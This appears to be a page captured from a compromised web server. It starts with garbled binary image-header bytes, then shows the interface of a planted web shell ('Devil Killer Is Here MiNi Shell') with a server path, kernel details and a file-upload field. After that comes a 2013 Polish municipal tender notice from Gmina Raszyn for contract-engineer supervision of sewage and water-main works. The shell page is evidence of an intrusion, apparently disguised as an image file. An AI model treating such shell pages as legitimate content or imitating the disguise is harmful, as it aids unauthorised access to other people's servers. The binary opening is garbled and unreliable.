JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/65991-N-2013.html

<p class="kh_header"><b>Raszyn: Pełnienie funkcji Inżyniera Kontraktu dla zadań wykonywanych w ramach projektu: Uporządkowanie gospodarki wodno-ściekowj w Gminie Raszyn</b><br>
<b>Numer ogłoszenia: 65991 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raszyn , ul. Szkolna 2a, 05-090 Raszyn, woj. mazowieckie, tel. 022 7017770, faks 022 7017778.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.raszyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.raszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla zadań wykonywanych w ramach projektu: Uporządkowanie gospodarki wodno-ściekowj w Gminie Raszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa obejmuje pełnienie funkcji Inżyniera Kontraktu dla zadań:
Zadanie nr 1 budowa kanalizacji sanitarnej - Dawidy, Dawidy Bankowe w ramach projektu: Uporządkowanie gospodarki wodno-ściekowej w Gminie Raszyn - FAZA II - etap I
Zadanie nr 2 budowa kanalizacji sanitarnej wraz z przykanalikami w ul. Warszawskiej, Grudzi we wsi Dawidy w ramach projektu Uporządkowanie gospodarki wodno-ściekowej w Gminie Raszyn
Zadanie nr 3 budowa kanalizacji sanitarnej i wodociągowej we wsi Dawidy Bankowe, Łady w ramach projektu Uporządkowanie gospodarki wodno-ściekowej w Gminie Raszyn oraz Uporządkowanie gospodarki wodno-ściekowej w Gminie Raszyn - FAZA III - etap I
Projekt Uporządkowanie gospodarki wodno -ściekowej w Gminie Raszyn realizowany jest na podstawie umowy z Wojewódzkim Funduszem Ochrony Środowiska o dofinansowanie nr POIŚ.01.01.00-00-088/08 z dnia 23.07.2010 r. Zaś Projekt Uporządkowanie gospodarki wodno-ściekowej na terenie Gminy Raszyn- faza II został zgłoszony do dofinansowania w ramach Funduszu Spójności objętego Programem Operacyjnym Infrastruktura i Środowisko, realizowanym w latach 2007-2013. 
W ramach niniejszego postępowania, Inżynier Kontraktu zobowiązany będzie do nadzorowania robót budowlanych wykonywanych w ramach Zadania nr 1 - Budowa kanalizacji sanitarnej we wsi Dawidy Bankowe i Dawidy realizowany w ramach Projektu Uporządkowanie gospodarki wodno - ściekowej na terenie Gminy Raszyn - Faza II.  Projekt ubiega się o dofinansowanie z Funduszu Spójności w ramach POIiŚ. W przedmiotowym kontrakcie został wyłoniony w drodze przetargu nieograniczonego wykonawca robót kanalizacyjnych - firma SKANSKA S.A. Oddział Budownictwa Inżynieryjnego w Warszawie. Wykonawca rozpoczął roboty budowlane w 2012 r.(przekazanie placu budowy odbyło się dn. 18.09.2012 r.). W ramach kontraktu zostanie wybudowany: kanał grawitacyjny fi 200 - 5919,50m, kanał tłoczny fi 100 - 578,70m, kanał tłoczny fi 90 - 114,00m, przyłącza do granicy działki fi 160 - 787,60 m (197 szt.) oraz przyłącza do granicy działki fi 160 - 323,60 m( 173 szt.). Zgodnie z projektem wybudowane zostaną również dwie przepompownie ścieków P15 fi 1500 i P15A fi 1200 wraz z instalacja elektryczną
Wartość zadania - 4.903.072,21 zł brutto. Zgodnie z zawarta umową termin zakończenia robót budowlanych ustalony został na dzień 31.10.2013 r.
W chwili obecnej przewiduje się, iż na koniec miesiąca kwietnia 2013 r. zgodnie z zatwierdzonym harmonogramem zaawansowanie robót w ramach kontraktu wyniesie 32,27%. 
W ramach Zadania nr 2 Budowa sieci kanalizacji sanitarnej wraz z przykanalikami w ul Warszawskiej, Grudzi we wsi Dawidy, w dniu w dniu 03.04.2013 r. upłynął termin składania ofert w postępowaniu prowadzonym w trybie przetargu nieograniczonego na wyłonienie Wykonawcy robót budowlanych dla przedmiotowego zamówienia. Do czasu ogłoszenia niniejszego postępowania, wykonawca robót budowlanych w ramach kontraktu nr 2 nie został jeszcze wyłoniony. 
W ramach zamówienia, wykonane zostaną: kanały grawitacyjne z rur PVC fi200x5,9 - 180,00 mb, kanały grawitacyjne z rur PVC fi250x7,3 - 8,70 mb, kanały tłoczne z rur PE fi110x6,6mm - 1028,00 mb, kanały tłoczne z rur PE fi90x5,4mm - 134,00 mb, przykanaliki z rur PVC fi160: 24,30 mb (długość przyłączy do granicy działki - szt. 6), sieciowe przepompownie ścieków : P14 i P15B wraz z instalacją elektryczną.
Zgodnie z kosztorysem inwestorskim szacunkowa wartość zmówienia, to: 965 708,11 zł netto. Termin wykonania robót został wyznaczony na dzień 30.09.2013 r. 
W ramach Zadania nr 3 Budowa kanalizacji sanitarnej i wodociągowej we wsi Dawidy Bankowe i Łady, ogłoszony został przetarg nieograniczony na wyłonienie Wykonawcy robót budowlanych dla przedmiotowego zamówienia. Termin składania ofert upływa w dniu 30.04.2013 r. 
Zadanie nr 3 Budowa kanalizacji sanitarnej i wodociągowej we wsi Dawidy Bankowe i Łady, obejmuje 4 zadania. Dwa zadania w ramach kontraktu tj. Budowa sieci kanalizacji sanitarnej oraz sieci wodociągowej w ul. Hetmańskiej w miejscowości Dawidy Bankowe i Budowa sieci kanalizacji sanitarnej w ul. bez nazwy (działka nr ew. 20/99) w miejscowości Dawidy Bankowe realizowane będą w ramach Projektu Uporządkowanie gospodarki wodno - ściekowej na terenie Gminy Raszyn. Pozostałe dwa zadania: Budowa sieci kanalizacji sanitarnej oraz sieci wodociągowej w ul. Ułańskiej i ul. Szlacheckie (działki nr ew. 21, 17/7, 17/8) w miejscowości Dawidy Bankowe i Budowa sieci wodociągowej w ul. Lawendowej w miejscowości Łady realizowane będą w ramach Projektu Uporządkowanie gospodarki wodno - ściekowej na terenie Gminy Raszyn - faza III.
W ramach zamówienia, wykonana zostanie sieć kanalizacji sanitarnej o łącznej długości 605,00 m oraz sieć wodociągowa o łącznej długości 1205,00 m
Zgodnie z kosztorysem inwestorskim szacunkowa wartość zmówienia, to: 1 307 184,54 zł netto. Termin wykonania robót został wyznaczony na dzień 31.08.2013 r. 
Nadzór nad realizacją każdego z w/w zadań, obejmuje administrowanie i finansowe zarządzanie zgodnie z procedurami Funduszu Spójności - POIiŚ, polskimi regulacjami prawnymi w szczególności zgodnie z ustawą Prawo budowlane oraz ustawą Prawo zamówień publicznych
Zakres usług będących przedmiotem zamówienia obejmuje:
1. reprezentowanie interesów Zamawiającego,
2. zapewnienie profesjonalnego i kompleksowego nadzoru inwestorskiego nad prowadzonymi robotami zgodnie z ustawa Prawo budowlane i aktami wykonawczymi do tej ustawy w liczbie pracowników niezbędnych do sprawnego i prawidłowego realizowania kontraktów oraz koordynacji poszczególnych robót,
3. bezstronne i obiektywne uczestniczenie w procesie inwestycyjnym (Inżynier stoi na straży prawidłowo wykonanego Kontraktu zgodnie z jego zapisami oraz obowiązującymi przepisami i zasadami sztuki budowlanej; podejmuje bezstronne decyzje np. w sprawie roszczeń Wykonawcy, wydaje polecenia Wykonawcy zgodnie z zasadami kontraktu),
4. stałe konsultacje i doradztwo fachowe dla Zamawiającego w tym:
-zarządzanie finansowe - udział w kwalifikacji kosztów, -zapewnienie zgodności robót z kontraktami, -bieżącą sprawozdawczość na podstawie własnej oceny, -monitorowanie i kontrola zamierzonego w projekcie efektu rzeczowego, -monitorowanie i kontroli zamierzonego w projekcie efektu ekologicznego, -analizie ryzyka w zakresie nadzorowanych kontraktów,
5. kontrolę nad właściwym i terminowym wdrażaniem Kontraktów na roboty oraz koordynowaniu działań wszystkich podmiotów uczestniczących w Projekcie,
6. egzekwowanie przy współpracy z Zamawiającym postanowień wszystkich Kontraktów na roboty, 
7. poddanie się kontroli instytucji finansującej,
8. przestrzeganie postanowień umowy na Inżyniera Kontraktu,
9. prowadzenie, przechowywanie i archiwizowanie korespondencji pomiędzy podmiotami biorącymi udział w realizacji kontraktów na roboty ze szczególnym uwzględnieniem wpisów do dzienników budów, ostrzeżeń, uwag i wniosków kierowanych do wykonawcy mogących być dowodami w razie ewentualnych sporów, roszczeń Wykonawcy, katastrof budowlanych itp.,
10. wykonywanie innych niezbędnych działań w celu prawidłowego wykonywania umowy.
Inżynier Kontraktu powinien ustanowić system zapewniający skuteczny nadzór nad wykonywanymi robotami budowlanymi oraz zarządzeniem kontraktów tj. kontrolowaniu pod względem: jakości i ilości, monitorowaniu postępu robót budowlanych i wydatków oraz administrowaniu robotami.
UWAGA: Ze względu na decydujące znaczenie funkcji Kierowania Projektu i Inspektora nadzoru branży konstrukcyjno-budowlanej w realizacji przedmiotu zamówieniu Zamawiający nie dopuszcza podwykonawstwa w zakresie pełnienia tych funkcji, w myśli art. 36 ust 5 ustawy Pzp..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.53.00.00-2, 71.54.00.00-5, 71.54.10.00-2, 71.21.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000,00 zł (trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże się wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem głównych usług w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których te usługi zostały wykonane w tym: 1 (jedną) usługę (zakończoną) odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. polegającej na pełnieniu funkcji Inżyniera Kontraktu przy realizacji inwestycji z zakresu gospodarki wodno-ściekowej dot. budowy kanalizacji sanitarnej o długości co najmniej 5 km, wraz z załączeniem dowodów (poświadczeń), czy wykazane usługi zostały wykonane należycie.
UWAGA:
Dowodami są poświadczenia wystawione przez podmiot na rzecz którego były wykonane usługi, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych, poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku, gdy Zamawiający jest podmiotem na rzecz którego, usługi zostały wykonane, Wykonawca nie ma obowiązku przedkładania dowodów (poświadczeń).
W przypadku zamówień na usługi - dowodem może być oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
W okresie 12 miesięcy od wejścia w życie Rozporządzenia z dnia 19 lutego 2013 r., w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane, Wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie usług.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami, niezbędnymi do prawidłowego wykonania zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, jak również zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami, w tym:
- Specjalista kluczowy nr 1 (Inżynier Rezydent), posiadający wykształcenie wyższe techniczne, oraz min. 15-letnie doświadczenie zawodowe w kierowaniu zespołem ludzi sprawujących nadzór inwestorski w tym co najmniej 6 lat przy realizacji inwestycji z zakresu gospodarki wodno-ściekowej oraz co najmniej 1 raz pełniącą funkcję Inżyniera Rezydenta lub Kierownika Zespołu nadzoru inwestorskiego przy realizacji zakończonej inwestycji z zakresu gospodarki wodno-ściekowej o wartości robót nie mniejszej niż 3 000 000,00 zł brutto, 
- Specjalista kluczowy nr 2 (Menadżer kosztów), posiadający wykształcenie wyższe techniczne, oraz min. 5-letnie doświadczenie zawodowe w rozliczaniu robót budowlano-montażowych, w tym co najmniej 3 lata na stanowisku związanym z rozliczeniem robót budowlano-montażowych z zakresu gospodarki wodno-ściekowej, sporządzaniem sprawozdań o robót finansowych;
- Specjalista kluczowy nr 3 (Inspektor nadzoru) - specjalista z zakresu robót instalacyjnych i sieci sanitarnych, posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r. Nr 83, poz. 578) lub  odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz będący czynnym członkiem właściwej izby samorządu zawodowego, posiadający min. 5-letnie  doświadczenie w zarządzaniu robotami w ww. specjalności przy realizacji inwestycji z zakresu gospodarki wodno-ściekowej  w tym co najmniej 1 raz  pełnił  funkcję Inspektora Nadzoru inwestorskiego lub kierownika robót przy budowie kanalizacji sanitarnej lub deszczowej o łącznej długość zrealizowanych robót co najmniej 5 km;
Specjalista kluczowy nr 4 (Inspektor nadzoru) - specjalista w zakresie robót elektrycznych, posiadający uprawnienia do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r. Nr 83, poz. 578) lub  odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz będący czynnym członkiem właściwej izby samorządu zawodowego, posiadający min. 5-letnie doświadczenie w nadzorowaniu robót w w/w specjalności;
- Specjalista kluczowy nr 5 (Inspektor nadzoru) - specjalista w zakresie robót drogowych, posiadający uprawnienia do kierowania robotami budowlanymi w specjalności drogowej (zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r. Nr 83, poz. 578) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz będący czynnym członkiem właściwej izby samorządu zawodowego, posiadający min. 5-letnie doświadczenie w nadzorowaniu robót w w/w specjalności.
W przypadku legitymowania się uprawnieniami wydanymi na podstawie przepisów poprzednio obowiązujących zakres uprawnień powinien odpowiadać w/w specjalnościom</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) sytuacja ekonomiczna: Wykonawca winien wykazać, iż posiada opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 500 000,00 zł,
b) sytuacja finansowa: Wykonawca powinien wykazać, że posiada środki finansowe lub zdolność kredytową w wysokości minimum: 500 000,00 zł., potwierdzone informacją banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony formularz oferty (oryginał).
2.pełnomocnictwo (oryginał lub kopia notarialnie potwierdzona) do reprezentowania wykonawcy w postępowaniu i złożenia oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności w dokumentach rejestracyjnych lub w przypadku oferty składanej przez Wykonawców występujących wspólnie, pełnomocnictwo dla osoby podpisującej w ich imieniu ofertę (oryginał lub kopia notarialnie poświadczona) - załącznik Wykonawcy
3. dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu, określone w rozdziale VI SIWZ,
4. Wykaz usług, które Wykonawca zamierza powierzyć Podwykonawcom -wypełniany w przypadku wykonywania usług przez Podwykonawców,
5. kserokopia dokumentu potwierdzającego wniesienie wadium - załącznik Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach:
1)w zakresie zmiany terminu realizacji przedmiotu zamówienia, zakresu świadczenia Inwestora
Zastępczego z powodu:
a)zaistnienia konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,
b)zmian będących następstwem działania organów administracji, w szczególności przekroczenia zakreślonych przez prawo terminów wydawania decyzji, zezwoleń i uzgodnień oraz odmowy ich wydania na skutek błędów w dokumentacji projektowej,
c)gdy będzie to konieczne ze względu na zmianę powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
d)konieczności udzielenia zamówień dodatkowych lub uzupełniających w zakresie robót budowlano-montażowych wprowadzonych na pisemne żądanie Zamawiającego,
e)wystąpienia ryzyka przekroczenia budżetu Inwestycji,
i) zmiany zakresu rzeczowego robót budowlano - montażowych,
g)zmiany terminu zakończenia robót budowlano - montażowych przez ich Wykonawcę oraz zmiany terminu rozliczenia Inwestycji,
h)zmiany Harmonogramu Realizacji Inwestycji z przyczyn niezależnych od obu stron,
i)zmiany zasad finansowania lub kwoty dofinansowania inwestycji,
j) wskutek działań osób trzecich - uniemożliwiających wykonanie prac, nie będących konsekwencją winy którejkolwiek ze Stron,
k) konieczności zapewnienia bezpieczeństwa lub zapobieżenia awarii,
1) zaistnienia okoliczności, których Zamawiający nie był w stanie przewidzieć i którym nie mógł zapobiec podczas realizacji zamówienia,
2)w zakresie wynagrodzenia - w przypadku zmiany stawki podatku VAT,
3)w zakresie zmiany konta bankowego Inwestora Zastępczego,
